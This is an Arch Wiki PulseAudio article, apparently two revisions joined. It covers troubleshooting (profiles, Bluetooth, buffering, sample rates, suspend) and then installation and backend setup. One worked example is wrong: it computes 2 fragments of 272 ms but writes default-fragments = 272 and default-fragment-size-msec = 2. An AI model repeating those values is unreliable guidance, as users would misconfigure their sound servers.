An example use-case for this would be if you play music and also voice chat and want to output music to speakers (in this case Digital S/PDIF) and voice to headphones. (Analog)<br />
<br />
This is sometimes auto detected by pulseaudio but not always. If you know that your soundcard can output to both Analog and S/PDIF at the same time and pulseaudio does not have this option in it's profiles in pavucontrol, or veromix then you probably need to create a configuration file for your soundcard.<br />
<br />
More in detail you need to create a profile-set for your specific soundcard.<br />
This is done in two steps mostly.<br />
*Create udev rule to make pulseaudio choose your pulseaudio configuration file specific to the soundcard.<br />
* Create the actual configuration.<br />
<br />
Create a pulseadio udev rule.<br />
{{Note| This is only an example for Asus Xonar Essence STX.<br />
Read [[udev]] to find out the correct values.}}<br />
{{Note| Your configuration file should have lower number than the original pulseaudio rule to take effect.}}<br />
{{hc|/usr/lib/udev/rules.d/90-pulseaudio-Xonar-STX.rules|<br />
ACTION&#61;&#61;"change", SUBSYSTEM&#61;&#61;"sound", KERNEL&#61;&#61;"card*", \<br />
ATTRS&#123;subsystem_vendor&#125;&#61;&#61;"0x1043", ATTRS&#123;subsystem_device&#125;&#61;&#61;"0x835c", ENV&#123;PULSE_PROFILE_SET&#125;&#61;"asus-xonar-essence-stx.conf" <br />
}}<br />
<br />
Create now a configuration file. If you bother you can start from scratch and make if saucy. However you can also use the default configuration file rename it and then add your profile there that you know works. Less pretty but also faster.<br />
<br />
To enable multiple sinks for Asus Xonar Essence STX you need only to add this in.<br />
{{Note|{{ic|asus-xonar-essence-stx.conf}} also includes all code/mappings from {{ic|default.conf}}.}}<br />
{{hc|/usr/share/pulseaudio/alsa-mixer/profile-sets/asus-xonar-essence-stx.conf|<br />
[Profile analog-stereo+iec958-stereo]<br />
description &#61; Analog Stereo Duplex + Digital Stereo Output<br />
input-mappings &#61; analog-stereo<br />
output-mappings &#61; analog-stereo iec958-stereo<br />
skip-probe &#61; yes<br />
}}<br />
<br />
This will auto-profile your Asus Xonar Essence STX with default profiles and add your own profile so you can have multiple sinks.<br />
<br />
You need to create another profile in the configuration file if you want to have the same functionality with AC3 Digital 5.1 output.<br />
<br />
[https://www.freedesktop.org/wiki/Software/PulseAudio/Backends/ALSA/Profiles/ See pulseaudio article about profiles]<br />
<br />
=== Disable Bluetooth support ===<br />
<br />
If you do not use Bluetooth you may experience the following error in your journal:<br />
<br />
bluez5-util.c: GetManagedObjects() failed: org.freedesktop.DBus.Error.ServiceUnknown: The name org.bluez was not provided by any .service files<br />
<br />
To disable Bluetooth support in PulseAudio, make sure that the following lines are commented out in the configuration file in use ({{ic|~/.config/pulse/default.pa}} or {{ic|/etc/pulse/default.pa}}):<br />
<br />
{{hc|~/.config/pulse/default.pa|<br />
### Automatically load driver modules for Bluetooth hardware<br />
#.ifexists module-bluetooth-policy.so<br />
#load-module module-bluetooth-policy<br />
#.endif<br />
<br />
#.ifexists module-bluetooth-discover.so<br />
#load-module module-bluetooth-discover<br />
#.endif<br />
}}<br />
<br />
=== Bluetooth headset replay problems ===<br />
<br />
Some user [https://bbs.archlinux.org/viewtopic.php?id=117420 report] huge delays or even no sound when the bluetooth connection does not send any data. This is due to the {{ic|module-suspend-on-idle}} module, which automatically suspends sinks/sources on idle. As this can cause problems with headset, the responsible module can be deactivated.<br />
<br />
To disable loading of the {{ic|module-suspend-on-idle}} module, comment out the following line in the configuration file in use ({{ic|~/.config/pulse/default.pa}} or {{ic|/etc/pulse/default.pa}}):<br />
<br />
{{hc|~/.config/pulse/default.pa|<br />
### Automatically suspend sinks/sources that become idle for too long<br />
#load-module module-suspend-on-idle<br />
}}<br />
<br />
Finally restart PulseAudio to apply the changes.<br />
<br />
=== Automatically switch to Bluetooth or USB headset ===<br />
<br />
Add the following:<br />
{{hc|/etc/pulse/default.pa|<br />
# automatically switch to newly-connected devices<br />
load-module module-switch-on-connect<br />
}}<br />
<br />
=== Pulse overwrites ALSA settings ===<br />
<br />
Pulseaudio usually overwrites the ALSA settings- for example set with alsamixer- at start up, even when the alsa daemon is loaded. Since there seems to be no other way to restrict this behaviour, a workaround is to restore the alsa settings again after pulseaudio had started. Add the following command to {{ic|.xinitrc}} or {{ic|.bash_profile}} or any other [[Autostarting|autostart]] file:<br />
<br />
restore_alsa() {<br />
while [ -z "$(pidof pulseaudio)" ]; do<br />
sleep 0.5<br />
done<br />
alsactl -f /var/lib/alsa/asound.state restore <br />
}<br />
restore_alsa &<br />
<br />
=== Prevent Pulse from restarting after being killed ===<br />
<br />
Sometimes you may wish to temporarily disable Pulse. In order to do so you will have to prevent Pulse from restarting after being killed.<br />
<br />
{{hc|~/.config/pulse/client.conf|2=<br />
# Disable autospawning the PulseAudio daemon<br />
autospawn = no<br />
}}<br />
<br />
=== Daemon startup failed ===<br />
<br />
Try resetting PulseAudio:<br />
$ rm -rf /tmp/pulse* ~/.pulse*<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
If there is no server running but pulseaudio fails to start with an error message "User-configured server at ... refusing to start/autospawn", the issue may be with PulseAudio settings from a previous login. Check to see if there are any stale properties attached to the X11 root window with {{ic|pax11publish -d}}, and if there are, remove them with {{ic|pax11publish -r}} before trying to start the server. This manual cleanup is always required when using LXDM because it does not restart the X server on logout; see [[LXDM#PulseAudio]].<br />
<br />
==== inotify issue ====<br />
<br />
If the previous fix doesn't work, see if you get an error like this:<br />
{{hc|$ pulseaudio -vvvv|<br />
E: [pulseaudio] module-udev-detect.c: You apparently ran out of inotify watches, probably because Tracker/Beagle took them all away. I wished people would do their homework first and fix inotify before using it for watching whole directory trees which is something the current inotify is certainly not useful for. Please make sure to drop the Tracker/Beagle guys a line complaining about their broken use of inotify.<br />
}}<br />
<br />
In which case you have run out of inotify watches. <br />
<br />
This can quickly be resolved by:<br />
# echo 100000 > /proc/sys/fs/inotify/max_user_watches<br />
<br />
To have it permanently changed, use:<br />
{{hc|/etc/sysctl.d/99-sysctl.conf|2=<br />
# Increase inotify max watchs per user<br />
fs.inotify.max_user_watches = 100000<br />
}}<br />
<br />
=== padevchooser ===<br />
<br />
If one cannot launch the PulseAudio Device Chooser, first restart the Avahi daemon ('''avahi-daemon''').<br />
<br />
=== Glitches, skips or crackling ===<br />
<br />
The newer implementation of PulseAudio sound server uses a timer-based audio scheduling instead of the traditional interrupt-driven approach. <br />
<br />
Timer-based scheduling may expose issues in some ALSA drivers. On the other hand, other drivers might be glitchy without it on, so check to see what works on your system. <br />
<br />
To turn timer-based scheduling off add {{ic|1=tsched=0}} in {{ic|/etc/pulse/default.pa}}:<br />
{{hc|/etc/pulse/default.pa|<nowiki><br />
load-module module-udev-detect tsched=0<br />
</nowiki>}}<br />
<br />
Then restart the PulseAudio server:<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
Do the reverse to enable timer-based scheduling, if not already enabled by default.<br />
<br />
Please report any such cards to [http://pulseaudio.org/wiki/BrokenSoundDrivers PulseAudio Broken Sound Driver page]<br />
<br />
=== Setting the default fragment number and buffer size in Pulseaudio ===<br />
<br />
[http://forums.linuxmint.com/viewtopic.php?f=42&t=44862 More Information]<br />
<br />
==== Finding out your audio device parameters (1/4) ====<br />
<br />
To find your sound card buffering settings:<br />
$ echo autospawn = no >> ~/.pulse/client.conf<br />
$ pulseaudio -k<br />
$ LANG=C timeout --foreground -k 10 -s kill 10 pulseaudio -vvvv 2>&1 | grep device.buffering -B 10<br />
$ sed -i '$d' ~/.pulse/client.conf<br />
<br />
For each sound card detected by Pulseaudio, you will see output similar to this:<br />
I: [pulseaudio] source.c: alsa.long_card_name = "HDA Intel at 0xfa200000 irq 46"<br />
I: [pulseaudio] source.c: alsa.driver_name = "snd_hda_intel"<br />
I: [pulseaudio] source.c: device.bus_path = "pci-0000:00:1b.0"<br />
I: [pulseaudio] source.c: sysfs.path = "/devices/pci0000:00/0000:00:1b.0/sound/card0"<br />
I: [pulseaudio] source.c: device.bus = "pci"<br />
I: [pulseaudio] source.c: device.vendor.id = "8086"<br />
I: [pulseaudio] source.c: device.vendor.name = "Intel Corporation"<br />
I: [pulseaudio] source.c: device.product.name = "82801I (ICH9 Family) HD Audio Controller"<br />
I: [pulseaudio] source.c: device.form_factor = "internal"<br />
I: [pulseaudio] source.c: device.string = "front:0"<br />
I: [pulseaudio] source.c: device.buffering.buffer_size = "768000"<br />
I: [pulseaudio] source.c: device.buffering.fragment_size = "384000"<br />
<br />
Take note the buffer_size and fragment_size values for the relevant sound card.<br />
<br />
==== Calculate your fragment size in msecs and number of fragments (2/4) ====<br />
<br />
Pulseaudio's default sampling rate and bit depth are set to {{ic|44100Hz}} @ {{ic|16 bits}}.<br />
<br />
With this configuration, the bit rate we need is {{ic|44100}}*{{ic|16}} = {{ic|705600 bits per second. That's {{ic|1411200 bps}} for stereo.<br />
<br />
Let's take a look at the parameters we've found in the previous step:<br />
<br />
device.buffering.buffer_size = "768000" => 768000/1411200 = 0.544217687075s = 544 msecs<br />
device.buffering.fragment_size = "384000" => 384000/1411200 = 0.272108843537s = 272 msecs<br />
<br />
==== Modify Pulseaudio's configuration file (3/4) ====<br />
<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
; default-fragments = X<br />
; default-fragment-size-msec = Y<br />
</nowiki>}}<br />
<br />
In the previous step, we calculated the fragment size parameter.<br />
The number of fragments is simply buffer_size/fragment_size, which in this case ({{ic|544/272}}) is {{ic|2}}:<br />
<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
; default-fragments = '''272'''<br />
; default-fragment-size-msec = '''2'''<br />
</nowiki>}}<br />
<br />
==== Restart the Pulseaudio daemon (4/4) ====<br />
<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
For more information, see: [http://forums.linuxmint.com/viewtopic.php?f=42&t=44862 Linux Mint topic]<br />
<br />
=== Laggy sound ===<br />
<br />
This issue is due to incorrect buffer sizes.<br />
<br />
Either disable any modifications (if any) to these entries, or, if issue still exists, uncomment:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
default-fragments = 8<br />
default-fragment-size-msec = 5<br />
</nowiki>}}<br />
<br />
=== Choppy, overdriven sound ===<br />
<br />
Choppy sound in pulsaudio can result from wrong settings for the sample rate. Try:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
default-sample-rate = 48000<br />
</nowiki>}}<br />
and restart the PulseAudio server.<br />
<br />
If one experiences choppy sound in applications using openAL, change the sample rate in {{ic|/etc/openal/alsoft.conf}}:<br />
frequency = 48000<br />
<br />
Setting the PCM volume above 0dB can cause clipping of the audio signal. Running {{ic|alsamixer -c0}} will allow you to see if this is the problem and if so fix it.<br />
<br />
=== Volume adjustment does not work properly ===<br />
<br />
Check:<br />
{{ic|/usr/share/pulseaudio/alsa-mixer/paths/analog-output.conf.common}}<br />
<br />
If the volume does not appear to increment/decrement properly using {{ic|alsamixer}} or {{ic|amixer}}, it may be due to pulseaudio having a larger number of increments (65537 to be exact). Try using larger values when changing volume (e.g. {{ic|amixer set Master 655+}}).<br />
<br />
=== Volume gets louder every time a new application is started ===<br />
<br />
Per default, it seems as if changing the volume in an application sets the global system volume to that level instead of only affecting the respective application. Applications setting their volume on startup will therefore cause the system volume to "jump".<br />
<br />
Fix this by:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
flat-volumes = no<br />
</nowiki>}}<br />
and then restarting PulseAudio by executing<br />
$ pulseaudio -k && pulseaudio --start<br />
<br />
When Pulse comes back after a few seconds, applications will not alter the global system volume anymore but have their own volume level again.<br />
<br />
{{Note|A previously installed and removed pulseaudio-equalizer may leave behind remnants of the setup in {{ic|~/.pulse/default.pa}} which can also cause maximized volume trouble. Comment that out as needed.}}<br />
<br />
=== No mic on ThinkPad T400/T500/T420 ===<br />
<br />
Run:<br />
alsamixer -c 0<br />
Maximize the volume of/unmute the "Internal Mic".<br />
<br />
Once you see the device with:<br />
arecord -l<br />
you might still need to adjust the settings. The microphone and the audio jack are duplexed. Set the configuration of the internal audio in pavucontrol to ''Analog Stereo Duplex''.<br />
<br />
=== No mic input on Acer Aspire One ===<br />
<br />
Install pavucontrol, unlink the microphone channels and turn down the left one to 0.<br />
Reference: http://getsatisfaction.com/jolicloud/topics/deaf_internal_mic_on_acer_aspire_one#reply_2108048<br />
<br />
=== Sound output is only mono on M-Audio Audiophile 2496 sound card ===<br />
<br />
Add the following:<br />
{{hc|/etc/pulseaudio/default.pa|<nowiki><br />
load-module module-alsa-sink sink_name=delta_out device=hw:M2496 format=s24le channels=10 channel_map=left,right,aux0,aux1,aux2,aux3,aux4,aux5,aux6,aux7<br />
load-module module-alsa-source source_name=delta_in device=hw:M2496 format=s24le channels=12 channel_map=left,right,aux0,aux1,aux2,aux3,aux4,aux5,aux6,aux7,aux8,aux9<br />
set-default-sink delta_out<br />
set-default-source delta_in<br />
</nowiki>}}<br />
<br />
=== Static noise in microphone recording ===<br />
<br />
If we are getting static noise in skype, gnome-sound-recorder, arecord, etc.'s recordings then the sound card samplerate is incorrect. That is why there is static noise in linux microphone recordings. To fix this We need to set sample-rate in {{ic|/etc/pulse/daemon.conf}} for the sound hardware.<br />
<br />
==== Determine soundcards in the system (1/5) ====<br />
<br />
This requires alsa-utils and related packages to be installed:<br />
{{hc|$ arecord --list-devices|<br />
**** List of CAPTURE Hardware Devices ****<br />
card 0: Intel [HDA Intel], device 0: ALC888 Analog [ALC888 Analog]<br />
Subdevices: 1/1<br />
Subdevice #0: subdevice #0<br />
card 0: Intel [HDA Intel], device 2: ALC888 Analog [ALC888 Analog]<br />
Subdevices: 1/1<br />
Subdevice #0: subdevice #0<br />
}}<br />
<br />
Sound card is {{ic|hw:0,0}}.<br />
<br />
==== Determine sampling-rate of the sound card (2/5) ====<br />
{{hc|arecord -f dat -r 60000 -D hw:0,0 -d 5 test.wav|<br />
"Recording WAVE 'test.wav' : Signed 16 bit Little Endian, Rate 60000 Hz, Stereo<br />
Warning: rate is not accurate (requested = 60000Hz, '''got = 96000Hz''')<br />
please, try the plug plugin<br />
}}<br />
<br />
observe, the {{ic|got = 96000Hz}}. This is the max sample-rate of our card.<br />
<br />
==== Setting the soundcard's sampling rate into pulse audio configuration (3/5) ====<br />
<br />
The default sample-rate in pulseaudio:<br />
{{hc|$ grep "default-sample-rate" /etc/pulse/daemon.conf|<br />
; default-sample-rate = 44100<br />
}}<br />
<br />
{ic|44100}} is disabled and needs to be changed to {{ic|96000}}:<br />
# sed 's/; default-sample-rate = 44100/default-sample-rate = 96000/g' -i /etc/pulse/daemon.conf<br />
<br />
==== Restart pulseaudio to apply the new settings (4/5) ====<br />
<br />
$ pulseaudio -k<br />
$ pulseaudio --start<br />
<br />
==== Finally check by recording and playing it back (5/5) ====<br />
<br />
Let us record some voice using mic for say 10 seconds. Make sure the mic is not muted and all<br />
$ arecord -f cd -d 10 test-mic.wav<br />
<br />
After 10 seconds, let us play the recording...<br />
$ aplay test-mic.wav<br />
<br />
Now hopefully, there is no static noise in microphone recording anymore.<br />
<br />
=== My Bluetooth device is paired but does not play any sound ===<br />
<br />
[[Bluetooth#My_device_is_paired_but_no_sound_is_played_from_it|See the article in Bluetooth section]]<br />
<br />
Starting from PulseAudio 2.99 and bluez 4.101 you should '''avoid''' using Socket interface. Do NOT use:<br />
{{hc|/etc/bluetooth/audio.conf|<nowiki><br />
[General]<br />
Enable=Socket<br />
</nowiki>}}<br />
If you face problems with A2DP and PA 2.99 make sure you have {{Pkg|sbc}} library.<br />
<br />
=== Subwoofer stops working after end of every song ===<br />
<br />
Known issue: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/494099<br />
<br />
To fix this, must edit: {{ic|/etc/pulse/daemon.conf}} and enable {{ic|enable-lfe-remixing}} :<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
enable-lfe-remixing = yes<br />
</nowiki>}}<br />
<br />
=== Pulseaudio uses wrong microphone ===<br />
<br />
If Pulseaudio uses the wrong microphone, and changing the Input Device with Pavucontrol did not help, take a look at alsamixer. It seems that Pavucontrol does not always set the input source correctly.<br />
<br />
$ alsamixer<br />
<br />
Press {{ic|F6}} and choose your sound card, e.g. HDA Intel. Now press {{ic|F5}} to display all items. Try to find the item: {{ic|Input Source}}. With the up/down arrow keys you are able to change the input source.<br />
<br />
Now try if the correct microphone is used for recording.<br />
<br />
=== Choppy Sound with Analog Surround Sound Setup ===<br />
<br />
The low-frequency effects (LFE) channel is not remixed per default. To enable it the following needs to be set in {{ic|/etc/pulse/daemon.conf}} :<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
enable-lfe-remixing = yes<br />
</nowiki>}}<br />
<br />
=== No sound below a volume cutoff ===<br />
<br />
Known issue (won't fix): https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/223133<br />
<br />
If sound doesn't play when Pulseaudio's volume is set below a certain level, try {{ic|1=ignore_dB=1}} in {{ic|/etc/pulse/default.pa}}:<br />
{{hc|/etc/pulse/default.pa|<nowiki><br />
load-module module-udev-detect ignore_dB=1<br />
</nowiki>}}<br />
<br />
However, be aware that it may cause another bug preventing pulseaudio to unmute speakers when headphones or other audio devices are unplugged.<br />
<br />
=== Low volume for internal mic ===<br />
<br />
If you experience low volume on internal notebook microphone, try setting:<br />
{{hc|/etc/pulse/default.pa|<nowiki><br />
set-source-volume 1 300000<br />
</nowiki>}}<br />
<br />
=== Clients alter master output volume (aka volume jumps to 100% after running application) ===<br />
<br />
If changing volume in specific applications changes also master output volume you can try to diasble flat volumes. Set:<br />
{{hc|/etc/pulse/daemon.conf|<nowiki><br />
flat-volumes = no<br />
</nowiki>}}<br />
Then restart Pulseaudio daemon:<br />
# pulseaudio -k<br />
# pulseaudio --start<br />
<br />
===Realtime scheduling===<br />
If rtkit doesn't work, you can manually set up your system to run PulseAudio with realtime scheduling, which can help performance. To do this, add the following lines to {{ic|/etc/security/limits.conf}}:<br />
@pulse-rt - rtprio 9<br />
@pulse-rt - nice -11<br />
<br />
Afterwards, you need to add your user to the {{ic|pulse-rt}} group:<br />
# gpasswd -a <user> pulse-rt<br />
<br />
=== No sound after resume from suspend ===<br />
<br />
If audio generally works, but stops after resume from suspend, try "reloading" PulseAudio by executing:<br />
$ /usr/bin/pasuspender /bin/true<br />
<br />
This is better than completely killing and restarting it ({{ic|pulseaudio -k && pulseaudio --start`}}), because it doesn't break already running applications.<br />
<br />
If the above fixes your problem, you may wish to automate it, by creating a systemd service file.<br />
<br />
1. Create the template service file in {{ic|/etc/systemd/system/resume-fix-pulseaudio@.service}}:<br />
<br />
[Unit]<br />
Description=Fix PulseAudio after resume from suspend<br />
After=suspend.target<br />
<br />
[Service]<br />
User=%I<br />
Type=oneshot<br />
Environment="XDG_RUNTIME_DIR=/run/user/%U"<br />
ExecStart=/usr/bin/pasuspender /bin/true<br />
<br />
[Install]<br />
WantedBy=suspend.target<br />
<br />
2. Enable it for your user account<br />
<br />
# systemctl enable resume-fix-pulseaudio@YOUR_USERNAME_HERE.service<br />
<br />
3. Reload systemd<br />
<br />
# systemctl --system daemon-reload<br />
<br />
=== ALSA Channels Mute When Headphones Are Plugged/Unplugged Improperly ===<br />
If when you unplug your headphones or plug them in the audio remains muted in alsamixer on the wrong channel due to it being set to 0%, you may be able to fix it by opening /etc/pulse/default.pa and commenting out the line:<br />
load-module module-switch-on-port-available<br />
<br />
=== pactl "invalid option" error with negative percentage arguments ===<br />
{{ic|pactl}} commands that take negative percentage arguments will fail with an 'invalid option' error. Use the standard shell '--' pseudo argument<br />
to disable argument parsing before the negative argument. ''e.g.'' {{ic|pactl set-sink-volume 1 -- -5%}}.<br />
<br />
===Daemon already running===<br />
<br />
On some systems pulseaudio may be started multiple times. journalctl will report:<br />
<br />
[pulseaudio] pid.c: Daemon already running.<br />
<br />
Make sure to use only one method of autostarting applications. {{Pkg|pulseaudio}} includes these files:<br />
<br />
* {{ic|/etc/X11/xinit/xinitrc.d/pulseaudio}}<br />
* {{ic|/etc/xdg/autostart/pulseaudio.desktop}}<br />
* {{ic|/etc/xdg/autostart/pulseaudio-kde.desktop}}<br />
<br />
Also check user autostart files and directories, such as [[xinitrc]], {{ic|~/.config/autostart/}} etc.<br />
<br />
== See also ==<br />
* [http://www.alsa-project.org/main/index.php/Asoundrc http://www.alsa-project.org/main/index.php/Asoundrc] - Alsa wiki on .asoundrc<br />
* [http://www.pulseaudio.org/ http://www.pulseaudio.org/] - PulseAudio official site<br />
* [http://www.pulseaudio.org/wiki/FAQ http://www.pulseaudio.org/wiki/FAQ] - PulseAudio FAQ</div>Wakehttps://wiki.archlinux.org/index.php?title=PulseAudio&diff=290040PulseAudio2013-12-23T04:59:23Z<p>Wake: /* Troubleshooting */ Handling negative arguments with pactl.</p>
<hr />
<div>[[Category:Audio/Video]]<br />
[[Category:Sound]]<br />
[[cs:PulseAudio]]<br />
[[es:PulseAudio]]<br />
[[fr:PulseAudio]]<br />
[[it:PulseAudio]]<br />
[[pt:PulseAudio]]<br />
[[ru:PulseAudio]]<br />
[[tr:PulseAudio]]<br />
[[Wikipedia:PulseAudio|PulseAudio]] is a sound server commonly used by desktop environments like [[GNOME]] or [[KDE]]. It serves as a proxy to sound applications using existing kernel sound components like [[ALSA]] or [[OSS]]. Since [[ALSA]] is included in Arch Linux by default, the most common deployment scenarios include PulseAudio with [[ALSA]].<br />
<br />
{{Article summary start}}<br />
{{Article summary text|'''PulseAudio''' is a general purpose sound server. For a list of features, see [[Wikipedia:PulseAudio#Features]].}}<br />
{{Article summary heading|Related Articles}}<br />
{{Article summary wiki|PulseAudio/Examples}}<br />
{{Article summary end}}<br />
<br />
== Installation ==<br />
<br />
* Required package: {{Pkg|pulseaudio}}<br />
* Optional GTK GUIs: {{Pkg|paprefs}} and {{Pkg|pavucontrol}}<br />
* Optional volume control via mapped keyboard keys: {{AUR|pulseaudio-ctl}}<br />
* Optional console mixer: {{AUR|ponymix-git}} and {{AUR|pamixer-git}}<br />
* Optional system tray icon: {{AUR|pasystray-git}}<br />
* Optional KDE plasma applet: {{Pkg|kdemultimedia-kmix}} and {{AUR|kdeplasma-applets-veromix}}<br />
<br />
== Running ==<br />
{{Warning|If you have per-user copies of configuration files (such as {{ic|client.conf}}, {{ic|daemon.conf}} or {{ic|default.pa}}) in {{ic|~/.config/pulse/}} or {{ic|~/.pulse/}}, make sure you keep them in sync with changes to the packaged files in {{ic|/etc/pulse/}}. Otherwise, PulseAudio may refuse to start due to configuration errors.}}<br />
<br />
{{Note|<br />
* Pulseaudio requires [[D-Bus]] to function.<br />
* Most X11 environments start pulseaudio automatically with the X11 session.<br />
}}<br />
<br />
In the unlikely event that pulseaudio is not automatically called upon entering X, it can can be started with:<br />
$ pulseaudio --start<br />
<br />
PulseAudio can be stopped with:<br />
$ pulseaudio -k<br />
<br />
== Equalizer ==<br />
<br />
Newer pulseaudio versions have an intergrated 10-band equalizer system. In order to use the equalizer do the following:<br />
<br />
=== Load equalizer sink and dbus-protocol module ===<br />
<br />
$ pactl load-module module-equalizer-sink<br />
$ pactl load-module module-dbus-protocol<br />
<br />
=== Install and run the gui frontend ===<br />
<br />
Install {{Pkg|python-pyqt4}} and execute:<br />
<br />
$ qpaeq<br />
<br />
{{Note|If qpaeq has no effect, install {{pkg|pavucontrol}} and change "ALSA Playback on" to "FFT based equalizer on ..." while the media player is running.}}<br />
<br />
=== Load equalizer and dbus module on every boot ===<br />
<br />
Edit the file {{ic|/etc/pulse/default.pa}} with your favorite editor and append the following lines:<br />
<br />
### Load the integrated pulseaudio equalizer and dbus module<br />
load-module module-equalizer-sink<br />
load-module module-dbus-protocol<br />
<br />
== Backend Configuration ==<br />
<br />
=== ALSA ===<br />
<br />
* Recommended package: {{Pkg|pulseaudio-alsa}}<br />
* Optional packages: {{Pkg|lib32-libpulse}} and {{Pkg|lib32-alsa-plugins}}<br />
<br />
{{Note|Optional packages are needed only if running x86_64 and wanting to have sound for 32 bit programs (like Wine).}}<br />
<br />
For the applications that do not support PulseAudio and support ALSA it is '''recommended''' to install the PulseAudio plugin for ALSA. This package also contains the necessary {{ic|/etc/asound.conf}} for configuring ALSA to use PulseAudio.<br />
<br />
To prevent applications from using ALSA's OSS emulation and bypassing Pulseaudio (thereby preventing other applications from playing sound), make sure the module {{ic|snd_pcm_oss}} is not being loaded at boot. If it is currently loaded (<code>lsmod|grep oss</code>), disable it by executing:<br />
# rmmod snd_pcm_oss<br />
<br />
=== ALSA/dmix without grabbing hardware device ===<br />
<br />
{{Note|This section describes alternative configuration, which is generally '''not''' recommended.}}<br />
<br />
You may want to use ALSA directly in most of your applications and to be able to use other applications, which constantly require PulseAudio at the same time. The following steps allow you to make PulseAudio use dmix instead of grabbing ALSA hardware device.<br />
<br />
* Remove package {{Pkg|pulseaudio-alsa}}, which provides compatibility layer between ALSA applications and PulseAudio. After this your ALSA apps will use ALSA directly without being hooked by Pulse.<br />
<br />
* Edit {{ic|/etc/pulse/default.pa}}.<br />
:Find and uncomment lines which load backend drivers. Add '''device''' parameters as follows. Then find and comment lines which load autodetect modules.<br />
load-module module-alsa-sink '''device=dmix'''<br />
load-module module-alsa-source '''device=dsnoop'''<br />
# load-module module-udev-detect<br />
# load-module module-detect<br />
<br />
* ''Optional:'' If you use {{Pkg|kdemultimedia-kmix}} you may want to control ALSA volume instead of PulseAudio volume:<br />
$ echo export KMIX_PULSEAUDIO_DISABLE=1 > ~/.kde4/env/kmix_disable_pulse.sh<br />
$ chmod +x ~/.kde4/env/kmix_disable_pulse.sh<br />
<br />
* Now, reboot your computer and try running alsa and pulseaudio applications at the same time. They both should produce sound simultaneously.<br />
:Use {{Pkg|pavucontrol}} to control PulseAudio volume if needed.<br />
<br />
=== OSS ===<br />
<br />
There are multiple ways of making OSS-only programs play to PulseAudio:<br />
<br />
==== ossp ====<br />
<br />
Install {{Pkg|ossp}} package and start '''ossp''' service.<br />
<br />
==== padsp wrapper (part of PulseAudio) ====<br />
<br />
Programs using OSS can work with PulseAudio by starting it with padsp:<br />
<br />
$ padsp OSSprogram<br />
A few examples:<br />
$ padsp aumix<br />
$ padsp sox foo.wav -t ossdsp /dev/dsp<br />
<br />
You can also add a custom wrapper script like this: <br />
{{hc|/usr/local/bin/OSSProgram|<nowiki><br />
#!/bin/sh<br />
exec padsp /usr/bin/OSSprogram "$@"<br />
</nowiki>}}<br />
Make sure {{ic|/usr/local/bin}} comes before {{ic|/usr/bin}} in your '''PATH'''.<br />
<br />
=== GStreamer ===<br />
<br />
To make [[GStreamer]] use PulseAudio, you need to install {{Pkg|gst-plugins-good}} or {{Pkg|gstreamer0.10-good-plugins}}.<br />
<br />
=== OpenAL ===<br />
<br />
OpenAL Soft should use PulseAudio by default, but can be explicitly configured to do so: {{hc|/etc/openal/alsoft.conf|2=drivers=pulse,alsa}}<br />
<br />
=== libao ===<br />
<br />
Edit the libao configuration file:<br />
{{hc|# /etc/libao.conf|2=default_driver=pulse}}<br />
Be sure to remove the {{ic|1=dev=default}} option of the alsa driver or adjust it to specify a specific Pulse sink name or number. <br />
<br />
{{Note|You could possibly also keep the libao standard of outputting to the ''alsa'' driver and its default device if you install {{pkg|pulseaudio-alsa}} since the ALSA default device then '''is''' PulseAudio.}}<br />
<br />
=== ESD ===<br />
<br />
PulseAudio is a drop-in replacement for the enlightened sound daemon (ESD). While PulseAudio is running, ESD clients should be able to output to it without configuration.<br />
<br />
== Desktop environments ==<br />
<br />
=== General X11 ===<br />
<br />
{{Note|As mentioned previously, PulseAudio is very likely launched automatically via either {{ic|/etc/X11/xinit/xinitrc.d/pulseaudio}} or the files in {{ic|/etc/xdg/autostart/}} if users have some DE installed.}}<br />
<br />
Check to see if PulseAudio is running:<br />
<br />
{{hc|<nowiki>$ ps aux | grep pulse</nowiki>|<br />
facade 1794 0.0 0.0 360464 6532 ? S<l 15:33 0:00 /usr/bin/pulseaudio --start<br />
facade 1827 0.0 0.0 68888 2608 ? S 15:33 0:00 /usr/lib/pulse/gconf-helper<br />
}}<br />
<br />
If Pulseaudio is not running and users are using X, the following will start PulseAudio with the needed the X11 plugins manually:<br />
$ start-pulseaudio-x11<br />
<br />
If you are not running Gnome, KDE or XFCE and your {{ic|~/.xinitrc}} does not source the scripts in {{ic|/etc/X11/xinit/xinitrc.d}} (such as is done in the example file {{ic|/etc/skel/.xinitrc}}) then you can launch PulseAudio on boot with:<br />
{{hc|~/.xinitrc|<br />
/usr/bin/start-pulseaudio-x11<br />
}}<br />
<br />
=== GNOME ===<br />
<br />
As of GNOME 3, GNOME fully integrates with PulseAudio and no extra configuration is needed.<br />
<br />
=== KDE 3 ===<br />
<br />
PulseAudio is ''not'' a drop-in replacement for aRts. Users of KDE 3 cannot use PulseAudio. However note, recent versions of PulseAudio may have eliminated the prohibition:<br />
<br />
See: http://www.pulseaudio.org/wiki/PerfectSetup KDE 3 uses the artsd sound server by default. However, artsd itself can be configured to use an Esound backend. Edit {{ic|kcmartsrc}} (either in {{ic|/etc/kde}} or {{ic|/usr/share/config}} for global configuration or {{ic|.kde/share/config}} to configure only one user) like this:<br />
<br />
[Arts]<br />
Arguments=\s-F 10 -S 4096 -a esd -n -s 1 -m artsmessage -c drkonqi -l 3 -f<br />
NetworkTransparent=true<br />
SuspendTime=1<br />
<br />
=== KDE Plasma Workspaces and Qt4 ===<br />
<br />
PulseAudio, it will be used by KDE/Qt4 applications. For more information see the [http://www.pulseaudio.org/wiki/KDE KDE page in the PulseAudio wiki].<br />
<br />
PulseAudio support has been merged into KMix, the default KDE sound mixer.<br />
<br />
If the phonon-gstreamer backend is used for Phonon, GStreamer should also be [[PulseAudio#GStreamer|configured]] to use PulseAudio by installing {{Pkg|gstreamer0.10-good-plugins}}.<br />
<br />
One useful tidbit from that page is to add {{ic|load-module module-device-manager}} to {{ic|/etc/pulse/default.pa}}.<br />
<br />
